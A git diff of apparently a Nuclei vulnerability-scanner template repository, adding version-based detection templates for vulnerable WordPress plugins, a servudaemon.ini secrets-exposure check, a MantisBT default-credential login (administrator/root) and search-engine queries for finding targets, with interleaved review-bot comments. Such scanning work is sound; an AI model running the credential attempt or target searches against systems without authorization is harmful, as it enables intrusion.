 ./poc/other/tweeple-c09da88e763a76454c1f5cd48b0f9ec5.yaml
 ./poc/other/tweeple.yaml
 ./poc/other/tweet-blender-ceaa25919651090fe72a2b84b252f994.yaml
@@ -99878,6 +99965,7 @@
 ./poc/search/smart-woocommerce-search.yaml
 ./poc/search/smartsearchwp-22ceafab668da8aceedda2211b679417.yaml
 ./poc/search/smartsearchwp-88af2e7689c887d198ef309920089cf6.yaml
+./poc/search/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 ./poc/search/smartsearchwp.yaml
 ./poc/search/sort-searchresult-by-title-86feb80f760342151e6b43a07a4c470f.yaml
 ./poc/search/sort-searchresult-by-title.yaml
@@ -102458,6 +102546,7 @@
 ./poc/sql/CVE-2023-46775-fa3c164e68edbfcd38c2363997e968bc.yaml
 ./poc/sql/CVE-2023-46777-5a2317102f6d3d6e8aa325c42db23368.yaml
 ./poc/sql/CVE-2023-46821-db09b5836dd6824b2072d59978709e04.yaml
+./poc/sql/CVE-2023-47182-5df993839d8e6edf9fffc6cbdb77670b.yaml
 ./poc/sql/CVE-2023-47187-909c68db201bde38a76a95d22a6d1f88.yaml
 ./poc/sql/CVE-2023-47238-38157848adc81d3839ed96e64dba336d.yaml
 ./poc/sql/CVE-2023-47513-cdd05d50eb3c42421a74ddbb27f26ee6.yaml
@@ -102989,6 +103078,7 @@
 ./poc/sql/CVE-2024-3664-deb11912ff3d2208242b76566e91d4db.yaml
 ./poc/sql/CVE-2024-3666-5076756317edfc235b845db17943ad41.yaml
 ./poc/sql/CVE-2024-3670-fec3724139e128cadbd86aa3d4c79b55.yaml
+./poc/sql/CVE-2024-3673-7bf7b9165908fdbf2a2eafaed21dad07.yaml
 ./poc/sql/CVE-2024-3680-ec7d53ee9433a071987bdb6ca3443c79.yaml
 ./poc/sql/CVE-2024-37093-263295f735f2db17989d7aaa00124f9c.yaml
 ./poc/sql/CVE-2024-37100-bdbf132f7ff4f19dce18f2679e9d4a08.yaml
@@ -103124,6 +103214,7 @@
 ./poc/sql/CVE-2024-4532-babdc5829ad7d6c3dddb2e098b147720.yaml
 ./poc/sql/CVE-2024-4546-a45229e1e3c14d5bd8397e4b9cc875db.yaml
 ./poc/sql/CVE-2024-4551-f0f0671db838036fd9c1ce2adf4e33a0.yaml
+./poc/sql/CVE-2024-45625-cec96a6e743b0ccdbbe71bef62e99ef5.yaml
 ./poc/sql/CVE-2024-4623-a8fcd9d3aa8bba088dbbf516d83b5b4c.yaml
 ./poc/sql/CVE-2024-4630-dbe3ad2276d25849b33dd8a451ea349b.yaml
 ./poc/sql/CVE-2024-4643-1f0dfc263007df26c451c6afe8188db9.yaml
@@ -103170,6 +103261,7 @@
 ./poc/sql/CVE-2024-5541-eb1e7c9db560dc98453641b8dc95474b.yaml
 ./poc/sql/CVE-2024-5583-4bf5df60bad728c4d77db23548e2e248.yaml
 ./poc/sql/CVE-2024-5605-230eb371b3dbca7b916f8802ac8add36.yaml
+./poc/sql/CVE-2024-5628-1341f1db3b0e886d8e7026974e839398.yaml
 ./poc/sql/CVE-2024-5638-6b2bb507df8cc9b0ced9db594103e225.yaml
 ./poc/sql/CVE-2024-5713-29d3865418038fd895d3db73e7b26fc0.yaml
 ./poc/sql/CVE-2024-5724-4ec214434fd2f861667853a0711db2bf.yaml
@@ -103178,6 +103270,7 @@
 ./poc/sql/CVE-2024-5792-ddbb2190cd756b3ae01bb38e63370a72.yaml
 ./poc/sql/CVE-2024-5819-afdbf1b8ef18474cdef555c0be87fd78.yaml
 ./poc/sql/CVE-2024-5858-8478fd188db095b50a710c21aa308605.yaml
+./poc/sql/CVE-2024-5884-52f9cdbe6dddeb2847b178967af0721e.yaml
 ./poc/sql/CVE-2024-5937-874f8885fda0d2de8d0adb8690c59d59.yaml
 ./poc/sql/CVE-2024-5938-b9941f631d85ad0f37a1730dbd393bec.yaml
 ./poc/sql/CVE-2024-5942-bed1093c2baf9801f9d40df90c0dcdbc.yaml
@@ -103215,6 +103308,7 @@
 ./poc/sql/CVE-2024-6718-248ea11ff135db64e4802002a7613eb0.yaml
 ./poc/sql/CVE-2024-6752-ec708cb28101def2a2ec6f09281ef7db.yaml
 ./poc/sql/CVE-2024-6797-b6db90f6651f67f2c92f688656bcca15.yaml
+./poc/sql/CVE-2024-6889-1c8272a1873b60c8fedb66ae1ee69c2e.yaml
 ./poc/sql/CVE-2024-6928-66d36a40cf2172db26cce7deee6ee28d.yaml
 ./poc/sql/CVE-2024-6929-a777b884d41a272d1f526ce0db30cd1d.yaml
 ./poc/sql/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml
@@ -103232,10 +103326,12 @@
 ./poc/sql/CVE-2024-7817-49083f3d0aeb0ae2badbca3840ad0f3c.yaml
 ./poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml
 ./poc/sql/CVE-2024-7861-9726dbafcd5c9f5063d85ac5d4f9296c.yaml
+./poc/sql/CVE-2024-7891-a07b427b3532ab45f1726dadba231414.yaml
 ./poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml
 ./poc/sql/CVE-2024-8104-ce7e2be47ca5e025bb553db2616e0460.yaml
 ./poc/sql/CVE-2024-8195-55ed6b4889c7dbecb6bd9deee053ca6e.yaml
 ./poc/sql/CVE-2024-8197-c5c070dc8273cbfedbc9600c73cd97ad.yaml
+./poc/sql/CVE-2024-8242-cdbbac228ad219af93b654766e13b83b.yaml
 ./poc/sql/CVE-2024-8276-abcb50055a0fdc77a95290d651b9dbcc.yaml
 ./poc/sql/CVE-2024-8325-11327d2b9e1fdbe3b095a728909b8615.yaml
 ./poc/sql/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml
@@ -103891,6 +103987,7 @@
 ./poc/sql/beescms_v3-login-sql-injection.yaml
 ./poc/sql/beescms_v4-login-sqli.yaml
 ./poc/sql/before-and-after-product-images-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml
+./poc/sql/betheme-2738eb196d5cf7002027db186214d929.yaml
 ./poc/sql/betheme-71b13c5e1eda36a90193edb1421a40a0.yaml
 ./poc/sql/betheme-7d3ec953d47edbc8ce6f4ed6c46f8af2.yaml
 ./poc/sql/betheme-d02f3193d607dbca23dbb76cdd400429.yaml
@@ -104100,6 +104197,7 @@
 ./poc/sql/card-oracle-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/cardealer-f36dfc31a31a830daf051a2485d66db9.yaml
 ./poc/sql/cardoza-wordpress-poll-38d62d0c5d6ffb83660279b8431dbf0a.yaml
+./poc/sql/carousel-slider-2fe9ad7647c04f89fbdba50824aa349b.yaml
 ./poc/sql/cart-link-for-woocommerce-7714e46aadb6af1daf94d807dc766b46.yaml
 ./poc/sql/cart66-lite-fd0ff818ca0522fefd55b57edbbb7623.yaml
 ./poc/sql/cartoon-url-6477bf18cad6c823db485408d49b337b.yaml
@@ -104923,6 +105021,7 @@
 ./poc/sql/ewww-image-optimizer-b9efeda8e09633d025bca4d34db28329.yaml
 ./poc/sql/exchange-addon-paypal-pro-6459e7fdb142b3e7fda28346cfeee4cf.yaml
 ./poc/sql/exclusive-addons-for-elementor-4e0b3f5938dbbcb7b6d25d649232d602.yaml
+./poc/sql/exit-notifier-b42fe76d662d705db55d79a49ebb4329.yaml
 ./poc/sql/exmage-wp-image-links-8d79d83518fbf44f7d865eaecb121db1.yaml
 ./poc/sql/expire-tags-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/export-job-portal-management-system-sql-injection.yaml
@@ -105136,6 +105235,7 @@
 ./poc/sql/funnelforms-free-82012b3f67d1609303680fdb66fee981.yaml
 ./poc/sql/fuse-social-floating-sidebar-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/fushion-theme-f5f50455a3255db857081d4e726d3048.yaml
+./poc/sql/fusion-builder-fde4dbc1536b247a205ddac8a2a684c9.yaml
 ./poc/sql/fusionspan-impexium-single-sign-on-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/fv-wordpress-flowplayer-16a8cdccb2f9e3068f83db4e3063e970.yaml
 ./poc/sql/fv-wordpress-flowplayer-8183200dbea3535a1918a4d91e3968a5.yaml
@@ -105264,6 +105364,7 @@
 ./poc/sql/grid-plus-077017011efa2b3f2430be7b8cdba8ec.yaml
 ./poc/sql/groundhogg-5cadbdd28bed6226920918f2d757bd2a.yaml
 ./poc/sql/gs-facebook-comments-81db78745401f1401bd51653102e0d12.yaml
+./poc/sql/gs-logo-slider-6788144065d375977e89ac972dbadb54.yaml
 ./poc/sql/gs-logo-slider-c92e9f2db8e6ee93e464cb9a2fb6ae41.yaml
 ./poc/sql/gs-pinterest-portfolio-0dbb70674c2246972063f503b39edbdc.yaml
 ./poc/sql/gs-pinterest-portfolio-f2a044c46a36110d5e1ed7a24c4dbe0a.yaml
@@ -105627,6 +105728,7 @@
 ./poc/sql/learnpress-78fcb432956d8619a95c109adb53f6cb.yaml
 ./poc/sql/learnpress-8edba280e7a9fce26832b1657089d2d6.yaml
 ./poc/sql/learnpress-cff8affa6bcd5a83a59d60fa8af94dbb.yaml
+./poc/sql/leira-roles-270e3fdb06570cfef003e572f24bd104.yaml
 ./poc/sql/letsrecover-woocommerce-abandoned-cart-fdbc8dce3a6dd8419dc7c5c3b97075c0.yaml
 ./poc/sql/letterpress-db74e52300ad937a8b884324069429c8.yaml
 ./poc/sql/levelfourstorefront-3ad05ad572cc7dbd0e29978f399c8e16.yaml
@@ -105977,6 +106079,7 @@
 ./poc/sql/ninja-forms-9c13bdb7049f6f5d5ad6e024cf5cd6bb.yaml
 ./poc/sql/ninja-forms-a156cc503d95e44ca5feb19fb22d90db.yaml
 ./poc/sql/ninja-forms-db5cbbe2e62074df44cb5125a2b60b42.yaml
+./poc/sql/ninja-forms-dbba8836e7c63cb37d729f0bede3c08c.yaml
 ./poc/sql/ninja-tables-8fa7023464934a870d2201236db1fe4b.yaml
 ./poc/sql/ninjalibs-ses-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/nitek-carousel-cool-transitions-6477bf18cad6c823db485408d49b337b.yaml
@@ -106801,6 +106904,7 @@
 ./poc/sql/smart-variations-images-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/smartbi-db2-params-rce.yaml
 ./poc/sql/smartideo-25529e788ad3d7f0507db0472772a1c9.yaml
+./poc/sql/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 ./poc/sql/sms_page_SQL.yaml
 ./poc/sql/smtp-mail-20dbd55968ba0f002b255462ae0c62d1.yaml
 ./poc/sql/smtp-mail-683425d6ce9e53ca25eaadb1963205f4.yaml
@@ -107177,6 +107281,7 @@
 ./poc/sql/tripay-payment-gateway-72213a7c863bdfaf87d000676e48db94.yaml
 ./poc/sql/tripetto-6477bf18cad6c823db485408d49b337b.yaml
 ./poc/sql/tripetto-b23eaee9ccbe3b3a04bf6fd27744db42.yaml
+./poc/sql/triton-lite-56db9447fe27bdd7df2cf18aa839dda3.yaml
 ./poc/sql/truebooker-appointment-booking-cd8e92fdb69812669db7332a5b930373.yaml
 ./poc/sql/trust-form-dae8041acebdb629070e4d9ea0b759eb.yaml
 ./poc/sql/trust-payments-gateway-3ds2-d008e1d31f091b729abd1db5951d088c.yaml
@@ -111586,6 +111691,7 @@
 ./poc/web/web-control-panel.yaml
 ./poc/web/web-crossing-server.yaml
 ./poc/web/web-data-administrator.yaml
+./poc/web/web-directory-free-2b58d77210c6a77720f0b93f6e969f27.yaml
 ./poc/web/web-directory-free-3fceffa0b8bd31b6154b8ede4f15579f.yaml
 ./poc/web/web-directory-free-acbd91edc6e3df1a9ab069d10efdd31f.yaml
 ./poc/web/web-directory-free-d197c71f58c2e43a1d446a0435b27bca.yaml
@@ -113560,6 +113666,7 @@
 ./poc/wordpress/slicewp-4653caf7fb563871a4a373a274fc0f86.yaml
 ./poc/wordpress/slicewp-68a7286dee82e01e0686b3618dc6461d.yaml
 ./poc/wordpress/slicewp-8bd7001db8b7e33a521a11f5cac60234.yaml
+./poc/wordpress/slicewp-93f0a57183ff79e378986791039cd4c0.yaml
 ./poc/wordpress/slicewp-a19fee43a6b0b996c7bac52248a26275.yaml
 ./poc/wordpress/slicewp-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/wordpress/slicewp-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml
@@ -113580,6 +113687,7 @@
 ./poc/wordpress/smartmag-responsive-retina-wordpress-magazine.yaml
 ./poc/wordpress/smartsearchwp-22ceafab668da8aceedda2211b679417.yaml
 ./poc/wordpress/smartsearchwp-88af2e7689c887d198ef309920089cf6.yaml
+./poc/wordpress/smartsearchwp-d6548d2e4933cf977717e8edbf658732.yaml
 ./poc/wordpress/smartsearchwp.yaml
 ./poc/wordpress/smarty-for-wordpress-2340c18a81723d13392a22e21155244a.yaml
 ./poc/wordpress/smarty-for-wordpress-bde5200861c2ea59ba4fd235f0f4f7d8.yaml
@@ -115748,6 +115856,7 @@
 ./poc/wordpress/wp-editor-8747d7af8402edcfbcb6230e90d25140.yaml
 ./poc/wordpress/wp-editor-c489d3bdfb8499c978184619111131c4.yaml
 ./poc/wordpress/wp-editor-da74f42ca762c5729aa2b94eb0fd7ce9.yaml
+./poc/wordpress/wp-editor-e1f8a5df86e1e39a02f9abdc9b9b624e.yaml
 ./poc/wordpress/wp-editor.yaml
 ./poc/wordpress/wp-editormd-5039ee7a3e48f78cb73e586042e681ee.yaml
 ./poc/wordpress/wp-editormd.yaml
@@ -117986,6 +118095,7 @@
 ./poc/wordpress/wp-sierra-ff9293ba28748efa2ab9a2fe77385468.yaml
 ./poc/wordpress/wp-sierra.yaml
 ./poc/wordpress/wp-simple-booking-calendar-1a4a65ff6c4e9e7b39b22ebb17162091.yaml
+./poc/wordpress/wp-simple-booking-calendar-34f4a1a718c60d12e4d96b373b4a77ce.yaml
 ./poc/wordpress/wp-simple-booking-calendar-3d2ac451b259c3277d2d54d206f263ea.yaml
 ./poc/wordpress/wp-simple-booking-calendar.yaml
 ./poc/wordpress/wp-simple-events-2f6275948d172c97185bde6f2cd461a7.yaml
@@ -118487,6 +118597,7 @@
 ./poc/wordpress/wp-tell-a-friend-popup-form.yaml
 ./poc/wordpress/wp-terms-popup-1cce07d804e627ef58aa1266e2d0d645.yaml
 ./poc/wordpress/wp-terms-popup.yaml
+./poc/wordpress/wp-test-email-d972e6fc6b9fbf14ec77704417abbfe0.yaml
 ./poc/wordpress/wp-testimonial-widget-29c6802974791f322cc3fd42a505c031.yaml
 ./poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml
 ./poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml
@@ -118641,6 +118752,7 @@
 ./poc/wordpress/wp-ulike-2bb7f513b632904f2fe7b431054accce.yaml
 ./poc/wordpress/wp-ulike-39475117489d93030cc8ecbcc85522df.yaml
 ./poc/wordpress/wp-ulike-56294f850b6deb68875689873af4fb37.yaml
+./poc/wordpress/wp-ulike-5dc71d194ef6b07e577c2653b00da476.yaml
 ./poc/wordpress/wp-ulike-65dbd1cc39026e555d37756af24e3e40.yaml
 ./poc/wordpress/wp-ulike-7683f0a4fc4d71bd2490e49874d1303b.yaml
 ./poc/wordpress/wp-ulike-973866fe97ccfd67222e0c88aee0a279.yaml
@@ -119172,6 +119284,7 @@
 ./poc/wordpress/wpcf7-redirect-abd6bd305348b8021e7310c8ca2e06d0.yaml
 ./poc/wordpress/wpcf7-redirect-c8c16c617550c7db690dbef59bc3b26a.yaml
 ./poc/wordpress/wpcf7-redirect.yaml
+./poc/wordpress/wpcodefactory-helper-3e174cda9ee64e9ecefee07080044ff5.yaml
 ./poc/wordpress/wpcodefactory-helper-d41d8cd98f00b204e9800998ecf8427e.yaml
 ./poc/wordpress/wpcodefactory-helper-dc849e6722bcf19c8126dfe6335d7c79.yaml
 ./poc/wordpress/wpcodefactory-helper.yaml
diff --git a/poc/adobe/servudaemon-ini.yaml b/poc/adobe/servudaemon-ini.yaml
index f049976e9b..f3090cefa8 100644
--- a/poc/adobe/servudaemon-ini.yaml
+++ b/poc/adobe/servudaemon-ini.yaml
@@ -1,21 +1,21 @@
-id: servudaemon-ini
-
-info:
- name: servudaemon-ini
- author: NoRed0x
- severity: high
- description: This Nuclei template checks for sensitive data disclosure vulnerabilities at the servudaemon.ini file
- tags: config, secrets, leaks
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/servudaemon.ini'
- stop-at-first-match: true
- matchers:
- - type: word
- part: body
- words:
- - 'LocalSetupPassword'
- - '[GLOBAL]'
- - 'LogFileSystemMes'
+id: servudaemon-ini
+
+info:
+ name: servudaemon-ini
+ author: NoRed0x
+ severity: high
+ description: This Nuclei template checks for sensitive data disclosure vulnerabilities at the servudaemon.ini file
+ tags: config, secrets, leaks
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/servudaemon.ini'
+ stop-at-first-match: true
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'LocalSetupPassword'
+ - '[GLOBAL]'
+ - 'LogFileSystemMes'
diff --git a/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml b/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
new file mode 100644
index 0000000000..2ea00b5737
--- /dev/null
+++ b/poc/api/mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf.yaml
@@ -0,0 +1,59 @@
+id: mstore-api-38ba49601a425b3e76ea50d7fcb5c3bf
+
+info:
+ name: >
+ MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Unauthorized User Registration
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/59c5b6e7-74b0-430d-8b4a-5a42220f3ec9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mstore-api/"
+ google-query: inurl:"/wp-content/plugins/mstore-api/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mstore-api,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mstore-api"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.3')
\ No newline at end of file
diff --git a/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml b/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
new file mode 100644
index 0000000000..81d9e79112
--- /dev/null
+++ b/poc/api/mstore-api-5aa30296a4f0ae648270a4e74d17b635.yaml
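Review bot: The `classification` block of this new template ships with empty `cvss-metrics`, `cvss-score` and `cve-id` values while `tags` still begins with `cve`, and `description: >` is an empty folded scalar, so anything that consumes the output by CVE id or reads the finding gets nothing beyond the title; the templates for mstore-api-5aa30296…, login-screen-manager and sign-up-sheets in this commit have the same gaps. `shodan-query: 'vuln:'` looks like an unfilled placeholder and should be dropped or completed, and the two `version` extractors are identical apart from `internal: true`, so one of them is redundant. The matchers only establish that the plugin's readme.txt is served and that its `Stable tag` compares `<= 4.15.3`; the registration behaviour named in the title is never requested, which the description should state so a hit is triaged as a version-based exposure rather than a confirmed vulnerability, e.g. `description: Version-based detection only (readme.txt Stable tag <= 4.15.3); the affected registration endpoint is not requested.` The file is also written without a trailing newline.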
@@ -0,0 +1,59 @@
+id: mstore-api-5aa30296a4f0ae648270a4e74d17b635
+
+info:
+ name: >
+ MStore API – Create Native Android & iOS Apps On The Cloud <= 4.15.3 - Authenticated (Subscriber+) Limited Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fe3834a6-a6f5-4cc7-951e-a6ada6346b07?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/mstore-api/"
+ google-query: inurl:"/wp-content/plugins/mstore-api/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,mstore-api,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mstore-api"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.15.3')
\ No newline at end of file
diff --git a/poc/auth/Mantis-Default_login.yaml b/poc/auth/Mantis-Default_login.yaml
index 58cb63c201..4ffeb88644 100644
--- a/poc/auth/Mantis-Default_login.yaml
+++ b/poc/auth/Mantis-Default_login.yaml
@@ -1,4 +1,5 @@
 id: mantisbt-default-credential
+
 info:
 name: MantisBT Default Admin Login
 author: For3stCo1d
@@ -13,6 +14,7 @@ info:
 cvss-score: 8.3
 cwe-id: CWE-522
 tags: mantisbt,default-login
+
 requests:
 - raw:
 - |
@@ -21,12 +23,14 @@ requests: Content-Type: application/x-www-form-urlencoded return=index.php&username={{user}}&password={{pass}} + attack: pitchfork payloads: user: - administrator pass: - root + matchers-condition: and matchers: - type: dsl
@@ -34,6 +38,7 @@ requests: - contains(tolower(all_headers), 'mantis_secure_session') - contains(tolower(all_headers), 'mantis_string_cookie') condition: and + - type: status status: - 302 diff --git a/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml b/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml new file mode 100644 index 0000000000..12f1b82a3f --- /dev/null +++ b/poc/auth/login-screen-manager-d96b919b70e327f92b0707dadc93f77b.yaml @@ -0,0 +1,59 @@ +id: login-screen-manager-d96b919b70e327f92b0707dadc93f77b + +info: + name: > + Login Screen Manager <= 3.5.2 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/288db6ba-5d6c-448d-85c5-f9a19a9391c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/login-screen-manager/" + google-query: inurl:"/wp-content/plugins/login-screen-manager/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,login-screen-manager,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/login-screen-manager/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "login-screen-manager" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.2') \ No newline at end of file diff --git a/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml b/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml new file mode 100644 index 0000000000..1d04c93c98 --- /dev/null 
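Review bot: This login-screen-manager template duplicates the CVE-2023-47182 template added later in the same commit: both fetch `login-screen-manager/readme.txt`, both match `compare_versions(version, '<= 3.5.2')` and both cite Wordfence id 288db6ba-5d6c-448d-85c5-f9a19a9391c0, but this copy has empty `cve-id` and CVSS fields. A host running the plugin will get two findings for one vulnerability, the weaker one without the CVE. Keep the CVE-2023-47182 file and drop this one, or fold its metadata into it.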
+++ b/poc/auth/sign-up-sheets-2274954363ea101c579ff78257df6249.yaml @@ -0,0 +1,59 @@ +id: sign-up-sheets-2274954363ea101c579ff78257df6249 + +info: + name: > + Sign-up Sheets <= 2.2.12 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ba06e298-308d-4378-96b8-5ac4e7cc63c0?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/sign-up-sheets/" + google-query: inurl:"/wp-content/plugins/sign-up-sheets/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,sign-up-sheets,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sign-up-sheets/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sign-up-sheets" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.2.12') \ No newline at end of file diff --git a/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml b/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml new file mode 100644 index 0000000000..7308d44473 --- /dev/null +++ b/poc/auth/yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96.yaml 
@@ -0,0 +1,59 @@ +id: yith-custom-login-5833fd7b8ccc9d761d8d7cf9f9917d96 + +info: + name: > + YITH Custom Login <= 1.7.3 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0828a4a4-2dd5-4dff-8563-c81d6b24b949?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/yith-custom-login/" + google-query: inurl:"/wp-content/plugins/yith-custom-login/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,yith-custom-login,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/yith-custom-login/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "yith-custom-login" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml b/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml new file mode 100644 index 0000000000..0fe58e74b6 --- /dev/null +++ b/poc/cve/CVE-2022-2446-12288e54ea2799c2827efda4c629c56e.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2022-2446-12288e54ea2799c2827efda4c629c56e + +info: + name: > + WP Editor <= 1.2.9 - Authenticated (Admin+) PHAR Deserialization + author: topscoder + severity: low + description: > + The WP Editor plugin for WordPress is vulnerable to deserialization of untrusted input via the 'current_theme_root' parameter in versions up to, and including 1.2.9. This makes it possible for authenticated attackers with administrative privileges to call files using a PHAR wrapper that will deserialize and call arbitrary PHP Objects that can be used to perform a variety of malicious actions granted a POP chain is also present. It also requires that the attacker is successful in uploading a file with the serialized payload. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f3555702-4427-4569-8fd6-f84113593e9d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2022-2446 + metadata: + fofa-query: "wp-content/plugins/wp-editor/" + google-query: inurl:"/wp-content/plugins/wp-editor/" + shodan-query: 'vuln:CVE-2022-2446' + tags: cve,wordpress,wp-plugin,wp-editor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-editor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-editor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.9') \ No newline at end of file 
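Review bot: `severity: low` (and the trailing `low` tag) contradicts `cvss-score: 7.2`, which is High on the CVSS 3.1 scale; consumers that filter on severity will drop a finding whose own vector reads C:H/I:H/A:H. If the downgrade is deliberate because the vector requires PR:H, record that next to the field, e.g. `# severity lowered from CVSS High: exploitation requires an administrator account`; otherwise set `severity: high` and the tag to match. The same severity/score disagreement appears in the CVE-2024-3899 (6.4/low), CVE-2024-45429 (5.5/low), CVE-2024-5561 (4.4/low), CVE-2024-5567 (6.4/low) and CVE-2024-5628 (6.4/low) templates, all of which score Medium on the CVSS scale.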
